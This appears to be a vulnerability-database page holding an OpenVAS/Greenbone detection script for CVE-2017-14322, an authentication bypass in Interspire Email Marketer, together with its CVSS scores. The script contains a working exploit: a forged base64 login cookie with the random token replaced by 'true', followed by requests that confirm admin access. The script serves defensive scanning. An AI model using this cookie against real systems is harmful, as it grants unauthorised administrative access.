CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
96.5%
Interspire Email Marketer (IEM) is prone to a remote authentication admin bypass vulnerability.
# SPDX-FileCopyrightText: 2017 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:interspire:iem";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.112087");
script_version("2023-06-22T10:34:15+0000");
script_tag(name:"last_modification", value:"2023-06-22 10:34:15 +0000 (Thu, 22 Jun 2023)");
script_tag(name:"creation_date", value:"2017-10-19 08:54:12 +0200 (Thu, 19 Oct 2017)");
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_tag(name:"severity_vector", value:"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_tag(name:"severity_origin", value:"NVD");
script_tag(name:"severity_date", value:"2019-05-10 17:49:00 +0000 (Fri, 10 May 2019)");
script_tag(name:"qod_type", value:"remote_app");
script_tag(name:"solution_type", value:"VendorFix");
script_cve_id("CVE-2017-14322");
script_name("Interspire IEM Remote Authentication Admin Bypass Vulnerability");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2017 Greenbone AG");
script_family("Web application abuses");
script_dependencies("gb_interspire_iem_detect.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("interspire/iem/installed");
script_tag(name:"summary", value:"Interspire Email Marketer (IEM) is prone to a remote authentication admin bypass vulnerability.");
script_tag(name:"vuldetect", value:"This script sends a specially crafted cookie to the web-server that IEM is running to bypass the admin authentication.");
script_tag(name:"insight", value:"The application creates a login cookie to determine and verify the user/admin.
A weak consideration of the type during the confirmation of the cookie's parameters causes the application to grant access to an attacker who forged this specific cookie parameter
by replacing the randomly generated string with just a boolean value ('true').");
script_tag(name:"impact", value:"Successfully exploiting the vulnerability will grant the attack full administration access to the IEM services on the host system.");
script_tag(name:"affected", value:"IEM before version 6.1.6");
script_tag(name:"solution", value:"Upgrade to IEM version 6.1.6 to fix the issue.");
script_xref(name:"URL", value:"https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html");
script_xref(name:"URL", value:"http://seclists.org/fulldisclosure/2017/Oct/39");
exit(0);
}
include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");
if (!port = get_app_port(cpe:CPE))
exit(0);
if (!dir = get_app_location(cpe:CPE, port:port))
exit(0);
if(dir == "/")
dir = "";
url = dir + "/admin/index.php?Page=&Action=Login";
# forged part of the cookie, encoded to base64: 'a:4:{s:4:"user";s:1:"1";s:4:"time";i:1710477294;s:4:"rand";b:1;s:8:"takemeto";s:9:"index.php";}'
cookie = "IEM_CookieLogin=YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE3MTA0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30=";
# additional data that might be required for a valid login
data = "ss_username=admin&ss_password=admin&ss_takemeto=index.php&SubmitButton=Login";
req = http_post_put_req(port:port, url:url, data:data, add_headers:make_array("Cookie", cookie), accept_header:"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
res = http_keepalive_send_recv(port:port, data:req);
if (res =~ "^HTTP/1\.[01] 200" &&
('admin/index.php?Page=Addons&Addon=dbcheck"' >< res || 'admin/index.php?Page=Addons&Addon=checkpermissions' >< res) &&
('<div class="loggedinas">' >< res || '<a href="index.php?Page=Logout"' >< res)
)
{
# Successfully bypassed the authentication.
# For further confirmation of the vulnerability a new GET request is being sent to the host in order to obtain crucial system information.
url = dir + "/admin/index.php?Page=Settings&Action=showinfo";
req = http_get_req(port:port, url:url, add_headers:make_array("Cookie", cookie), accept_header:"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
res = http_keepalive_send_recv(port:port, data:req);
if (res =~ "^HTTP/1\.[01] 200" &&
(('System' >< res && 'Build Date' >< res) || '<title>phpinfo()</title>' >< res ||
'<h1>Configuration</h1>' >< res || ('SERVER_ADMIN' >< res && 'SERVER_ADDR' >< res))
)
{
report = "It was possible to bypass the admin authentication and get unrestricted access to the Interspire Email Marketer system.";
security_message(port:port, data:report);
exit(0);
}
}
exit(99);
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
96.5%